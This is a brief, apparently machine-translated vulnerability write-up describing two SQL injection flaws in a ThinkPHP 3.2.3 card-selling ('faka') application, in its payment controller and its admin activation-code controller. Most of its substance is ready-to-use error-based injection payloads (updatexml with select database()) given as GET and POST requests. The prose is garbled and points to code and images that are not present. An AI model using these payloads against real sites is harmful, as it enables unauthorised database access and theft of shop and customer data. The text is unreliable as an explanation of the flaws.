Issuing a get source thinkphp3.2.3 development directory structure is shown below:
A reception injection .SQL
Vulnerability file address: D: \ phpStudy \ WWW \ faka \ App \ Home \ Controller \ PayController.class.php
Exploit code as shown below:
Did not get filtered through GET parameter order directly into the inside where the query results in causing SQL injection method can be used exp payload structure
payload:http://127.0.0.1/faka/index.php/home/pay/doalipay/?order[0]=exp&order[1]=and%201=(updatexml(1,concat(0x3a,(select%20database())),1))%23
Two background injection .SQL
Vulnerability file address: D: \ phpStudy \ WWW \ faka \ App \ Admin \ Controller \ JihuomaController.class.php
As shown the bugs in the code:
Directly into the conditional statements where inquiry leads to splicing caused by SQL injection after POST to get the ID parameter.
payload:http://www.faka.com/index.php/admin/Jihuoma/index
POST:id=1) and%201=(updatexml(1,concat(0x3a,(select%20database())),1))%23